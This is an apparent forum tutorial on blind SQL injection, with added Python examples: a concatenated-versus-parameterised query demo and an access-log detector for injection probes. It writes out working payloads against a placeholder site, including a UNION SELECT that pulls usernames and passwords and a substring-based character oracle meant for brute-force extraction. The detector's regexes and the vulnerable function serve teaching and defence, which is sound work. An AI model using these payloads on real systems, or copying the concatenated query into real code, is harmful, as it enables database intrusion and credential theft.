What is Blind SQL Injection?
Blind SQL Injection works in a similar way to SQL Injection, except that the page does not display an error message (or the query's output); the only feedback you get is whether the page changes.
How do I find a Blind SQL vulnerability?
To find a page which is vulnerable to SQL injection you need to append to a premade SQL query. For instance, a page such as http://www.example.com/blind/sql/vulnerable.php?id=2
This query is asking:
SELECT (required data) FROM (required table) WHERE id = 2
We can exploit this by adding an extra condition on the end, e.g.
http://www.example.com/blind/sql/vulnerable.php?id=2 AND 1=1
This should not change the output, but the AND 1=1 is still shown in the URL (and an always-false condition such as AND 1=2 would change the output).
How does this help me?
You now have a page which can answer true or false to any query you ask it. By using subqueries and the like you can discover data from the database one answer at a time. This takes time and effort and is therefore inefficient; a better way is a simple brute-force type program which can build up a picture of the database.
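Why the page ends up answering true or false at all comes down to how the query is built. The following is an added example, not code from the original post: it reproduces the string-concatenated lookup pattern (assumed here to be what vulnerable.php does) beside a parameterised version, using an in-memory SQLite table with constructed sample rows. With concatenation the injected condition becomes part of the WHERE clause, so the page's output depends on it; with type validation and a bound parameter the same input is rejected and no oracle exists.

```python
# Added example (not from the original post): the concatenated lookup that
# creates a true/false oracle, next to the parameterised lookup that does not.
# The table, rows and function names are constructed for illustration.
import sqlite3


def make_db():
    """Build an in-memory SQLite database with two constructed sample articles."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)"
    )
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?, ?)",
        [(1, "First post", "hello"), (2, "Second post", "world")],
    )
    return conn


def lookup_concat(conn, raw_id):
    """Vulnerable pattern: the raw query-string value is pasted into the SQL text.

    Anything after the number becomes part of the WHERE clause, so the caller
    can append conditions and read the answer from whether a row comes back.
    """
    sql = "SELECT title FROM articles WHERE id = " + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_param(conn, raw_id):
    """Hardened pattern: validate the type, then bind the value as a parameter.

    The value is never interpreted as SQL, so appended conditions are simply
    not a valid id and the page gives no true/false signal.
    """
    try:
        article_id = int(raw_id)
    except ValueError:
        return None  # reject anything that is not a plain integer
    row = conn.execute(
        "SELECT title FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for value in ("2", "2 AND 1=1", "2 AND 1=2"):
        print(repr(value), "concat ->", lookup_concat(db, value),
              "| param ->", lookup_param(db, value))
```

Run stand-alone, the concatenated lookup returns the article for "2" and "2 AND 1=1" but nothing for "2 AND 1=2", which is exactly the oracle described above; the parameterised lookup returns the article only for the plain "2".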
Finding Column Number
By using the "ORDER BY" clause, you can find out how many columns are being queried, e.g.
http://www.example.com/blind/sql/vulnerable.php?id=2 ORDER BY 5
If the query selects at least 5 columns then you will still see your results; otherwise you will receive an error or a blank page.
Grabbing Different Table's Data
You can also use UNION statements to grab data from other tables, e.g.
http://www.example.com/blind/sql/vul...e.php?id=99999 UNION ALL SELECT null,null,concat(username,password),null,null FROM users
How do I do this?
Well, simply put, you connect to the vulnerable file and try things such as substrings, for example:
http://www.example.com/blind/sql/vulnerable.php?id=2 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 109
This asks for the first user table in the database and the 1st character of its name. If it fits the criterion that the name begins with a letter after m in the alphabet (ASCII 109 is 'm') then the page will display the article. Now a brute-force type program can recover the whole name by continuing the sequence until it has all the data. Note that this particular query uses SQL Server syntax (sysobjects, TOP 1), whereas the concat() example above is MySQL syntax; the technique is the same, only the functions differ.
This is not a very well known exploit and it is difficult to prevent and spot, because each request looks like an ordinary page view that happens to succeed or fail. Watch out for it, as it can be very useful!
Thanks for reading guys
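Since the post says this is hard to spot, here is an added example (not part of the original post) of what spotting it can look like from the server side: a small detector for the probe patterns described above (AND 1=1 style conditions, ORDER BY column counting, UNION SELECT, and ascii/substring character tests) run over constructed Apache-style access log lines. The log lines, client address, rule names and paths are assumptions for illustration; the query strings are the ones shown in this post, URL-encoded as a browser would send them.

```python
# Added example (not from the original post): flag access-log requests whose
# query string carries the blind SQL injection probes described above.
# Sample log lines, rule names and the client address are constructed.
import re
from urllib.parse import unquote_plus, urlsplit

# Each rule is (name, regex) and is applied to the URL-decoded query string.
RULES = [
    ("boolean-condition", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("order-by-probe", re.compile(r"\bORDER\s+BY\s+\d+", re.I)),
    ("union-select", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("char-oracle", re.compile(r"\b(ascii|substring|substr)\s*\(", re.I)),
]

# Combined Log Format: client ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: one normal page view followed by the four probes
# from the post, with spaces encoded as %20 or + the way a browser sends them.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] '
    '"GET /blind/sql/vulnerable.php?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] '
    '"GET /blind/sql/vulnerable.php?id=2%20AND%201=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:52 +0000] '
    '"GET /blind/sql/vulnerable.php?id=2+ORDER+BY+5 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:03 +0000] '
    '"GET /blind/sql/vulnerable.php?id=99999+UNION+ALL+SELECT+null,null,null+FROM+users'
    ' HTTP/1.1" 200 4870 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:19 +0000] '
    '"GET /blind/sql/vulnerable.php?id=2+AND+ascii(lower(substring((SELECT+TOP+1+name'
    "+FROM+sysobjects+WHERE+xtype%3D'U'),1,1)))%3E109 HTTP/1.1\" 200 5120 \"-\" \"Mozilla/5.0\"",
]


def classify_request(path):
    """Return the names of every rule matching the decoded query string of one request path."""
    decoded = unquote_plus(urlsplit(path).query)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan_log(lines):
    """Return (client_ip, path, [rule names]) for each log line that trips at least one rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Combined Log Format line; skip rather than guess
        names = classify_request(m.group("path"))
        if names:
            hits.append((m.group("ip"), m.group("path"), names))
    return hits


if __name__ == "__main__":
    for ip, path, names in scan_log(SAMPLE_LOG):
        print(ip, ",".join(names), path)
```

Decoding the query string before matching matters: the same probe arrives as "%20AND%201=1" from one client and "+AND+1=1" from another, and a detector working on the raw path would miss one of them. In practice the useful signal is the same client tripping the boolean-condition or char-oracle rule many times in a row against one parameter, which is what the brute-force program described above produces.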